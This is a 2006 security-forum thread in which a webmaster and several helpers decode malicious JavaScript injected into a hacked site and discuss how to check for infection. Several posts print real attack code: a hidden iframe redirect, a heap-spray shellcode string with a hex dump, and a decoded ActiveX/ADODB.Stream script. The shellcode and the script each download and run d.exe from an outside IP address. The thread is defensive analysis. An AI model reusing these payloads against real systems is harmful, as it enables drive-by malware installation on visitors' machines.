Malicious javascript obfustication

Discussion in 'Computer Security' started by Wong Yung, Oct 23, 2006.

  1. Wong Yung

    Wong Yung Guest

    Hi

    Recently the webserver my page is on was hacked. Someone put in some
    malicious javascript which I believe redirects the browser to another
    webpage. I want to go to the URL directly using something like links
    on Linux or Safari on Mac (as I have a strong suspicion it's probably
    exploitin some IE vulnerability or trying to download some Windows
    trojan) to work out what exactly it was trying to do. However it looks
    like the URL was obfusticated:

    Is there any tool I can use to work out what the URL is from this?

    Thanks!
    Wong Yung, Oct 23, 2006
    #1
    1. Advertising

  2. Wong Yung

    Todd H. Guest

    "Wong Yung" <> writes:

    > Hi
    >
    > Recently the webserver my page is on was hacked. Someone put in some
    > malicious javascript which I believe redirects the browser to another
    > webpage. I want to go to the URL directly using something like links
    > on Linux or Safari on Mac (as I have a strong suspicion it's probably
    > exploitin some IE vulnerability or trying to download some Windows
    > trojan) to work out what exactly it was trying to do. However it looks
    > like the URL was obfusticated:
    >
    >
    >
    > Is there any tool I can use to work out what the URL is from this?


    It's javascript so a web browser is all you need.

    It's a rot 4 encoding if you will. It's just taking each of the
    characters of that string s and subtracting 4 from it
    i.e. s.charCodeAt(i)-4

    By changing document.write(o) to an alert() call you can see what it
    says.

    It translates to

    <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">


    And that page appears to redirect somewhere else.

    <a
    href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>



    --
    Todd H.
    http://www.toddh.net/
    Todd H., Oct 23, 2006
    #2
    1. Advertising

  3. Wong Yung

    Wong Yung Guest

    Todd H. wrote:
    > "Wong Yung" <> writes:
    >
    > > Hi
    > >
    > > Recently the webserver my page is on was hacked. Someone put in some
    > > malicious javascript which I believe redirects the browser to another
    > > webpage. I want to go to the URL directly using something like links
    > > on Linux or Safari on Mac (as I have a strong suspicion it's probably
    > > exploitin some IE vulnerability or trying to download some Windows
    > > trojan) to work out what exactly it was trying to do. However it looks
    > > like the URL was obfusticated:
    > >
    > >
    > >
    > > Is there any tool I can use to work out what the URL is from this?

    >
    > It's javascript so a web browser is all you need.
    >
    > It's a rot 4 encoding if you will. It's just taking each of the
    > characters of that string s and subtracting 4 from it
    > i.e. s.charCodeAt(i)-4
    >
    > By changing document.write(o) to an alert() call you can see what it
    > says.
    >
    > It translates to
    >
    > <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
    >
    >
    > And that page appears to redirect somewhere else.
    >
    > <a
    > href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
    >
    >
    >
    > --
    > Todd H.
    > http://www.toddh.net/


    Thanks very much Todd!

    I went to the webpage and it's very strange. It doesn't seem to
    attempt to download anything. They (kaonline.biz) claim that someone
    is trying to blackmail them by sending spam in their name and then
    trying to extort money from them. If this is true and they are not
    lying their heads off I wonder if this is part of the supposed
    extortion attempt. Or maybe they're just saying that because really
    they are spammers and...*Sigh* I don't know what to believe anymore.

    Still this is only what it is doing *now*. The webserver looks like it
    has been hacked for a while now and god knows what's been happening in
    the meantime.

    Thanks though for helping out!
    Wong Yung, Oct 23, 2006
    #3
  4. Wong Yung

    Todd H. Guest

    "Wong Yung" <> writes:

    > Thanks very much Todd!
    >
    > I went to the webpage and it's very strange. It doesn't seem to
    > attempt to download anything. They (kaonline.biz) claim that someone
    > is trying to blackmail them by sending spam in their name and then
    > trying to extort money from them. If this is true and they are not
    > lying their heads off I wonder if this is part of the supposed
    > extortion attempt. Or maybe they're just saying that because really
    > they are spammers and...*Sigh* I don't know what to believe anymore.
    >
    > Still this is only what it is doing *now*. The webserver looks like it
    > has been hacked for a while now and god knows what's been happening in
    > the meantime.
    >
    > Thanks though for helping out!


    No problem.

    Was your webhost based on cpanel.net software? A few weeks ago, a
    whole bunch of cpanel based sites got owned and were used largely to
    spread the Internet Explorer 0day exploit dujour. I think that
    issue has been patched but it did affect a lot of folks. Curious if
    you were one of em.

    Best Regards,
    --
    Todd H.
    http://www.toddh.net/
    Todd H., Oct 23, 2006
    #4
  5. Wong Yung

    Wong Yung Guest

    Todd H. wrote:
    > "Wong Yung" <> writes:
    >
    > > Thanks very much Todd!
    > >
    > > I went to the webpage and it's very strange. It doesn't seem to
    > > attempt to download anything. They (kaonline.biz) claim that someone
    > > is trying to blackmail them by sending spam in their name and then
    > > trying to extort money from them. If this is true and they are not
    > > lying their heads off I wonder if this is part of the supposed
    > > extortion attempt. Or maybe they're just saying that because really
    > > they are spammers and...*Sigh* I don't know what to believe anymore.
    > >
    > > Still this is only what it is doing *now*. The webserver looks like it
    > > has been hacked for a while now and god knows what's been happening in
    > > the meantime.
    > >
    > > Thanks though for helping out!

    >
    > No problem.
    >
    > Was your webhost based on cpanel.net software? A few weeks ago, a
    > whole bunch of cpanel based sites got owned and were used largely to
    > spread the Internet Explorer 0day exploit dujour. I think that
    > issue has been patched but it did affect a lot of folks. Curious if
    > you were one of em.
    >
    > Best Regards,
    > --
    > Todd H.
    > http://www.toddh.net/



    No,

    I think the webserver was running Apache on Linux (I say "I think"
    because I wasn't admining it so I don't know what exactly was running
    on the computer). The problem is it wasn't updated and so I guess in
    the end you can say it was all our own fault.

    *Sigh* I'm still worried though because even though it looks like the
    hack is fairly harmless now it looks like it was hacked a while ago and
    who knows if they hadn't taken the opportunity to download Trojans onto
    a few computers first. You know how it is with security - once one
    thing gets compromised everything touching it is tainted because you
    can't be sure what the hackers were doing.

    Usually I run either Linux (most of these redirect things lead to some
    Windows specific malware) or Windows with Firefox with the NoScript
    extension which blocks all javascript except on sites you whitelist.
    However, I *did* test my website in IE several times when the script
    was present so I could make sure the css looked OK. Nor did I turn off
    scripting in IE because I hardly ever use it and I didn't think my own
    website would be a security risk. Not sure what to do now...probably
    run a full anti-virus and anti-spyware check but you know that doesn't
    catch everything. On the bright side of things I don't remember any
    anti-virus alerts, or probably more importantly any warnings about
    something trying to replace program x with a different version (I have
    a program which detects when program files get changed) when I was
    looking at my site in IE...

    Anyway, thanks a lot for your help. It did help relieve my mind a lot.
    Wong Yung, Oct 23, 2006
    #5
  6. Wong Yung

    Wong Yung Guest

    Todd H. wrote:
    > "Wong Yung" <> writes:
    >
    > > Hi
    > >
    > > Recently the webserver my page is on was hacked. Someone put in some
    > > malicious javascript which I believe redirects the browser to another
    > > webpage. I want to go to the URL directly using something like links
    > > on Linux or Safari on Mac (as I have a strong suspicion it's probably
    > > exploitin some IE vulnerability or trying to download some Windows
    > > trojan) to work out what exactly it was trying to do. However it looks
    > > like the URL was obfusticated:
    > >
    > >
    > >
    > > Is there any tool I can use to work out what the URL is from this?

    >
    > It's javascript so a web browser is all you need.
    >
    > It's a rot 4 encoding if you will. It's just taking each of the
    > characters of that string s and subtracting 4 from it
    > i.e. s.charCodeAt(i)-4
    >
    > By changing document.write(o) to an alert() call you can see what it
    > says.
    >
    > It translates to
    >
    > <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
    >
    >
    > And that page appears to redirect somewhere else.
    >
    > <a
    > href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
    >
    >
    >
    > --
    > Todd H.
    > http://www.toddh.net/



    Actually looking more closely at it there seems to be something else
    going on as well. If I use links, it does exactly as you say.
    However, using Opera, Firefox or Konqueror what it does is goes to a
    webpage with


    <script>var
    s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    do{s+=s;}while(s.length<0x0900000);s+=unescape
    ("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320
    %u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2
    %uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
    %u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
    %uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
    %u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
    %u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
    %u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304
    %u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF
    %u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D
    %uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF
    %u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF
    %u7468%u7074%u2F3A%u362F%u2E36%u3633%u322E%u3134%u322E
    %u3334%u642F%u652E%u6578");</script></head><body><embed
    src="hacked3_files/-----------------------------------------------------------.html">

    (I named the file hacked3.html)

    The
    "hacked3_files/-----------------------------------------------------------.html"
    is a html file with:

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>403 Forbidden</TITLE>
    </HEAD><BODY>
    <H1>Forbidden</H1>
    You don't have permission to access /expd/----------- (the hypthens
    continue forever)
    AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv
    on this server.<P>
    <P>Additionally, a 404 Not Found
    error was encountered while trying to use an ErrorDocument to handle
    the request.
    <HR>
    <ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
    </BODY></HTML>

    So it looks like on Konqueror/Firefox/Opera it was trying to download a
    wmv file (which no longer exists on the server). On links however it
    seems to go to an entirely different webpage, the one which as you
    point out tries to go to http://kaonline.biz/.
    Wong Yung, Oct 23, 2006
    #6
  7. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > Actually looking more closely at it there seems to be something else
    > going on as well. If I use links, it does exactly as you say.
    > However, using Opera, Firefox or Konqueror what it does is goes to a
    > webpage with
    >
    > <script>var
    > s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    > do{s+=s;}while(s.length<0x0900000);s+=unescape
    > ("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320

    [snip]

    That variable "s" is storing executable code. The script inserts at
    least 9437184 "A" characters (a NOP sled of 0x41), followed by code
    which looks like this when dumped out in hex/ascii:

    0000 EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 .T.u<.t5x..V.v .
    0010 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74 .3.IA.3.6...(8.t
    0020 08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E ......@..;.u.^.^
    0030 24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03 $..f..K.^.......
    0040 C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C ..urlmon.dll.C:\
    0050 55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40 U.exe.3.d.@0x..@
    0060 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C ..p...@....@4.@|
    0070 8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC .@<...N.........
    0080 04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F ..,$<...P.6./p.o
    0090 FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB ....T$..R.3.SSR.
    00A0 24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83 $S..]......S....
    00B0 EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF ...,$b...~..s.@.
    00C0 FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F ..R.......http:/
    00D0 2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64 /66.36.241.243/d
    00E0 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 .exe............

    I'm guessing it would use urlmon.dll to download the file "d.exe" from
    66.36.241.243, which is a small executable packed using FSG. There's
    also a reference to a file "C:\U.exe".

    > The
    > "hacked3_files/-----------------------------------------------------------.html"
    > is a html file with:


    [...]

    > AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv


    The part between my snips had a control character (0x05) either side
    of it. I don't know the reason for that.

    [...]

    > So it looks like on Konqueror/Firefox/Opera it was trying to download a
    > wmv file (which no longer exists on the server). On links however it
    > seems to go to an entirely different webpage, the one which as you
    > point out tries to go to http://kaonline.biz/.


    It appears to be an exploit involving a wmv vulnerability, but I don't
    know how the binary code in the script variable "s" gets to be run.

    Also spotted here:
    http://www.castlecops.com/p842233-Possible_WMV_exploit.html
    Ant, Oct 24, 2006
    #7
  8. Wong Yung

    Wong Yung Guest

    Ant wrote:
    > "Wong Yung" wrote:


    >
    > > So it looks like on Konqueror/Firefox/Opera it was trying to download a
    > > wmv file (which no longer exists on the server). On links however it
    > > seems to go to an entirely different webpage, the one which as you
    > > point out tries to go to http://kaonline.biz/.

    >
    > It appears to be an exploit involving a wmv vulnerability, but I don't
    > know how the binary code in the script variable "s" gets to be run.
    >
    > Also spotted here:
    > http://www.castlecops.com/p842233-Possible_WMV_exploit.html



    Wow. Thanks very much for the info. And thanks heaps for
    unobfusticating the stuff in javascript. Hmmm...looking at the
    castlecops link it looks like we aren't the only ones who were hacked
    using the same thing. Do you have any idea why links goes to
    kaonline.biz? I'm trying to work out what role they play in all of
    this.
    Wong Yung, Oct 24, 2006
    #8
  9. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > Wow. Thanks very much for the info. And thanks heaps for
    > unobfusticating the stuff in javascript. Hmmm...looking at the
    > castlecops link it looks like we aren't the only ones who were hacked
    > using the same thing. Do you have any idea why links goes to
    > kaonline.biz? I'm trying to work out what role they play in all of
    > this.


    I don't know if they are involved. They say they're being attacked,
    so you could report it to them, but as far as I can tell there is no
    exploit if the redirect is to kaonline.biz.

    If I use wget on the "e7da7.in" link, I get redirected to kaonline.
    However, if I use telnet, the redirection is to:
    ht_p://66.36.241.243/expd/index.php
    (I've munged the "http" in case anyone's click-happy)

    That's where the malicious code is, and I found a different (and more
    obfuscated) exploit to what you posted before.

    Where you are redirected, and what exploit is served up probably
    depends on the user-agent header of the http request.
    Ant, Oct 25, 2006
    #9
  10. Wong Yung

    Wong Yung Guest

    Ant wrote:
    > "Wong Yung" wrote:
    >
    > > Wow. Thanks very much for the info. And thanks heaps for
    > > unobfusticating the stuff in javascript. Hmmm...looking at the
    > > castlecops link it looks like we aren't the only ones who were hacked
    > > using the same thing. Do you have any idea why links goes to
    > > kaonline.biz? I'm trying to work out what role they play in all of
    > > this.

    >
    > I don't know if they are involved. They say they're being attacked,
    > so you could report it to them, but as far as I can tell there is no
    > exploit if the redirect is to kaonline.biz.
    >
    > If I use wget on the "e7da7.in" link, I get redirected to kaonline.
    > However, if I use telnet, the redirection is to:
    > ht_p://66.36.241.243/expd/index.php
    > (I've munged the "http" in case anyone's click-happy)
    >
    > That's where the malicious code is, and I found a different (and more
    > obfuscated) exploit to what you posted before.
    >
    > Where you are redirected, and what exploit is served up probably
    > depends on the user-agent header of the http request.


    *Sigh* I couldn't get a nice simple evil guy could I? BTW what is this
    other more obfusticated exploit that you found?
    Wong Yung, Oct 27, 2006
    #10
  11. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > *Sigh* I couldn't get a nice simple evil guy could I?


    Many of the malware writers today are funded by organized crime, and
    the software is getting more sophisticated. It's not so much hackers
    having fun anymore.

    > BTW what is this other more obfusticated exploit that you found?


    There are a couple of levels of encoded script which I won't go
    through here, but eventually it boils down to this (some munging
    again; [ ] replace < >, and ht_p replaces http) ...

    [script language='jscript']
    a=new ActiveXObject('Shell.Application');
    var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
    x.Open('GET','ht_p://66.36.241.243/d.exe',0);
    x.Send();
    var s=new ActiveXObject('ADODB.Stream');
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile('../tm.exe',2);
    a.ShellExecute('../tm.exe');
    [/script]

    So here is another method of downloading "d.exe" from the same IP
    address as before, then using the ADODB.Stream cross-domain exploit
    to save the file as "tm.exe" and run it in the context of the local
    machine. MS patched this particular vulnerability some time ago.
    Ant, Oct 28, 2006
    #11
  12. Ant wrote:

    >> *Sigh* I couldn't get a nice simple evil guy could I?

    >
    > Many of the malware writers today are funded by organized crime, and
    > the software is getting more sophisticated. It's not so much hackers
    > having fun anymore.


    Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
    script that used its very own URL (retrieved by document.location) as a
    part of the self-decryption - anyone who didn't care for the URL anymore
    after 4 redirects (each with a new obfuscation) and didn't store it, had a
    little problem.
    At the end, the last obfuscation layer outputted a script in a broken way,
    so it didn't work correctly. But one could still figure out what it did -
    and among many classical IE "exploits" one could actually find two new
    ones. Reported them to Microsoft quickly, and a patch was never issued.
    Business as usual.

    > So here is another method of downloading "d.exe" from the same IP
    > address as before, then using the ADODB.Stream cross-domain exploit
    > to save the file as "tm.exe" and run it in the context of the local
    > machine. MS patched this particular vulnerability some time ago.


    Not quite true. One can sometimes trigger to download new or old versions
    of existing ActiveX controls (ignoring IE's settings), and then make such
    exploits work again. Even aside from that, just invoking an ActiveX control
    without any possibility to access its scripting, can have devasting side
    effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
    made Windows 2000 Server SP3 start the Telnet Server Service if installed.
    Sebastian Gottschalk, Oct 28, 2006
    #12
  13. Wong Yung

    Wong Yung Guest

    Sebastian Gottschalk wrote:
    > Ant wrote:
    >
    > >> *Sigh* I couldn't get a nice simple evil guy could I?

    > >
    > > Many of the malware writers today are funded by organized crime, and
    > > the software is getting more sophisticated. It's not so much hackers
    > > having fun anymore.

    >
    > Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
    > script that used its very own URL (retrieved by document.location) as a
    > part of the self-decryption - anyone who didn't care for the URL anymore
    > after 4 redirects (each with a new obfuscation) and didn't store it, had a
    > little problem.
    > At the end, the last obfuscation layer outputted a script in a broken way,
    > so it didn't work correctly. But one could still figure out what it did -
    > and among many classical IE "exploits" one could actually find two new
    > ones. Reported them to Microsoft quickly, and a patch was never issued.
    > Business as usual.
    >
    > > So here is another method of downloading "d.exe" from the same IP
    > > address as before, then using the ADODB.Stream cross-domain exploit
    > > to save the file as "tm.exe" and run it in the context of the local
    > > machine. MS patched this particular vulnerability some time ago.

    >
    > Not quite true. One can sometimes trigger to download new or old versions
    > of existing ActiveX controls (ignoring IE's settings), and then make such
    > exploits work again. Even aside from that, just invoking an ActiveX control
    > without any possibility to access its scripting, can have devasting side
    > effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
    > made Windows 2000 Server SP3 start the Telnet Server Service if installed.


    Now I'm getting scared...So how can I be sure there isn't any nasty
    stuff on my computer as a result of this? I've run a full antivirus
    check, a full antispyware check and a full anti-trojan check using
    Trojan Hunter and these programs at least say I'm clean. I am fully
    patched up (I always install the updates as soon as they become
    available). And I've run netstat and it doesn't show any strange
    internet connections and my firewall doesn't show any strange
    connections though of course it could be piggying-back on another
    program. *Sigh* Who'd thought that you'd get infected from your own
    webpage.
    Wong Yung, Oct 28, 2006
    #13
  14. Wong Yung wrote:

    >> [ActiveX is dangerous to no end]

    > Now I'm getting scared...So how can I be sure there isn't any nasty
    > stuff on my computer as a result of this?


    Comparing all relevant system binaries against a baseline set of checksums?

    Anyway, you said you're using Safari or Links (eh... try Links2). Those
    don't know anything about ActiveX - only IE is vulnerable. Maybe also
    Mozilla with the ActiveX plugin intentionally installed, but even then
    you've have to explicitly whitelist vulnerable controls in first place.

    > I've run a full antivirus check, a full antispyware check and a full
    > anti-trojan check using Trojan Hunter and these programs at least say I'm clean.


    Which means exactly nothing.

    > I am fully patched up (I always install the updates as soon as they become
    > available).


    Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
    you're not running Windows Server 2003), this means about nothing.

    > And I've run netstat and it doesn't show any strange
    > internet connections and my firewall doesn't show any strange
    > connections though of course it could be piggying-back on another
    > program.


    As already mentioned: If you didn't use IE, there's no reason why you would
    have any problem at all.

    > *Sigh* Who'd thought that you'd get infected from your own webpage.


    At least for IE, any user should think so: It's stated in the manual! [1]



    [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
    Caching Protection. It describes how you can activate a totally incomplete
    solution to an inherent design problem that makes cross-site-scripting
    trivially possible, in conjunction with the default full trust in the
    Windows Update website as the XSS target giving every website full access
    to all security-critical functions of IE.
    Sebastian Gottschalk, Oct 28, 2006
    #14
  15. Wong Yung

    Wong Yung Guest

    Sebastian Gottschalk wrote:
    > Wong Yung wrote:
    >
    > >> [ActiveX is dangerous to no end]

    > > Now I'm getting scared...So how can I be sure there isn't any nasty
    > > stuff on my computer as a result of this?

    >
    > Comparing all relevant system binaries against a baseline set of checksums?
    >
    > Anyway, you said you're using Safari or Links (eh... try Links2). Those
    > don't know anything about ActiveX - only IE is vulnerable. Maybe also
    > Mozilla with the ActiveX plugin intentionally installed, but even then
    > you've have to explicitly whitelist vulnerable controls in first place.
    >
    > > I've run a full antivirus check, a full antispyware check and a full
    > > anti-trojan check using Trojan Hunter and these programs at least say I'm clean.

    >
    > Which means exactly nothing.
    >
    > > I am fully patched up (I always install the updates as soon as they become
    > > available).

    >
    > Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
    > you're not running Windows Server 2003), this means about nothing.
    >
    > > And I've run netstat and it doesn't show any strange
    > > internet connections and my firewall doesn't show any strange
    > > connections though of course it could be piggying-back on another
    > > program.

    >
    > As already mentioned: If you didn't use IE, there's no reason why you would
    > have any problem at all.
    >
    > > *Sigh* Who'd thought that you'd get infected from your own webpage.

    >
    > At least for IE, any user should think so: It's stated in the manual! [1]
    >
    >
    >
    > [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
    > Caching Protection. It describes how you can activate a totally incomplete
    > solution to an inherent design problem that makes cross-site-scripting
    > trivially possible, in conjunction with the default full trust in the
    > Windows Update website as the XSS target giving every website full access
    > to all security-critical functions of IE.


    I use Linux at work but at home I have Windows XP. Usually I use
    Firefox. However, as I was changing some things on my site I thought
    that I should check that it works in IE as well (you know IE and
    css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
    the plague but I thought, hey it's my own homepage, should be safe.
    Right? Unfortunately I had IE on the default Moderate Security setting
    because I never use IE.

    *Sigh*
    Wong Yung, Oct 28, 2006
    #15
  16. Wong Yung

    Wong Yung Guest

    Wong Yung wrote:

    >
    > I use Linux at work but at home I have Windows XP. Usually I use
    > Firefox. However, as I was changing some things on my site I thought
    > that I should check that it works in IE as well (you know IE and
    > css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
    > the plague but I thought, hey it's my own homepage, should be safe.
    > Right? Unfortunately I had IE on the default Moderate Security setting
    > because I never use IE.
    >
    > *Sigh*


    Oh yeah, I forgot to mention. I may use Linux at work but practically
    everyone else uses Windows XP with IE. And of course they visit the
    hacked webpage fairly regularly which is actually not really my
    personal personal webpage but more like the webpage for the entire
    group (when I talk about my homepage I'm talking about my personal page
    in this larger group site) so they go there to say get the latest news
    and whatnot. I do too but I usually do so at work in Linux or if I'm
    at home using Windows using Firefox (the only time I used IE was for 2
    minutes once to check whether the css was screwed up or not. Sadly
    enough that may be all that was required to get myself hacked...).
    Most of the other people at work go there in Windows using IE. So as
    you can see, there is quite a lot of potential for trouble here...
    Wong Yung, Oct 28, 2006
    #16
  17. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > Sebastian Gottschalk wrote:
    >> Not quite true. One can sometimes trigger to download new or old versions
    >> of existing ActiveX controls (ignoring IE's settings), and then make such
    >> exploits work again. Even aside from that, just invoking an ActiveX control
    >> without any possibility to access its scripting, can have devasting side
    >> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
    >> made Windows 2000 Server SP3 start the Telnet Server Service if installed.

    >
    > Now I'm getting scared...So how can I be sure there isn't any nasty
    > stuff on my computer as a result of this?


    You could start by looking for those files mentioned in the exploits
    (u.exe, d.exe and tm.exe), although sometimes the malware will delete
    the initial files once it's installed.

    > I've run a full antivirus
    > check, a full antispyware check and a full anti-trojan check using
    > Trojan Hunter and these programs at least say I'm clean. I am fully
    > patched up (I always install the updates as soon as they become
    > available). And I've run netstat and it doesn't show any strange
    > internet connections and my firewall doesn't show any strange
    > connections though of course it could be piggying-back on another
    > program.


    If there's no unusual activity you are probably ok, but unless you're
    very familiar with your system the only sure way is to reformat the HD
    and reinstall the OS.

    There's now an 'ADODB.connection' vulnerability which has just been
    discovered. See http://isc.sans.org/diary.php?storyid=1807

    Next time you use IE on the Internet, be sure to disable ActiveX
    completely.
    Ant, Oct 29, 2006
    #17
  18. Ant wrote:

    > Next time you use IE on the Internet, be sure to disable ActiveX
    > completely.


    Doesn't matter. There ar various unpatched buffer overflows which can be
    triggered without any ActiveX or Scripting. In any case, you're pissed off.
    Sebastian Gottschalk, Oct 29, 2006
    #18
  19. Wong Yung

    Ant Guest

    "Sebastian Gottschalk" wrote:

    > Ant wrote:
    >> Next time you use IE on the Internet, be sure to disable ActiveX
    >> completely.

    >
    > Doesn't matter. There ar various unpatched buffer overflows which can be
    > triggered without any ActiveX or Scripting.


    Well, that doesn't surprise me.

    > In any case, you're pissed off.


    What do you mean by that? I'm quite content, thanks.
    Ant, Oct 29, 2006
    #19
  20. Wong Yung

    erewhon Guest


    >>
    >>
    >> Is there any tool I can use to work out what the URL is from this?

    >
    > It's javascript so a web browser is all you need.
    >
    > It's a rot 4 encoding if you will. It's just taking each of the
    > characters of that string s and subtracting 4 from it
    > i.e. s.charCodeAt(i)-4


    Can you explain the process/tools you use - I'm no code head but am
    impressed by this type of work
    erewhon, Oct 29, 2006
    #20
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. miss calm

    malicious forged posts in my name

    miss calm, Aug 6, 2003, in forum: Computer Support
    Replies:
    13
    Views:
    643
    Mellowed
    Aug 10, 2003
  2. bjones

    Malicious websites

    bjones, Dec 8, 2003, in forum: Computer Support
    Replies:
    27
    Views:
    917
    trout
    Dec 9, 2003
  3. Ionizer

    Malicious JPEG vulnerability

    Ionizer, Sep 16, 2004, in forum: Computer Support
    Replies:
    2
    Views:
    557
    Ionizer
    Sep 17, 2004
  4. Lew

    JavaScript and malicious code?

    Lew, Jan 27, 2006, in forum: Computer Support
    Replies:
    6
    Views:
    459
    zarathustra
    Jan 29, 2006
  5. Shane

    To Javascript, or not to Javascript

    Shane, Aug 29, 2005, in forum: NZ Computing
    Replies:
    5
    Views:
    403
    Waylon Kenning
    Aug 30, 2005
Loading...

Share This Page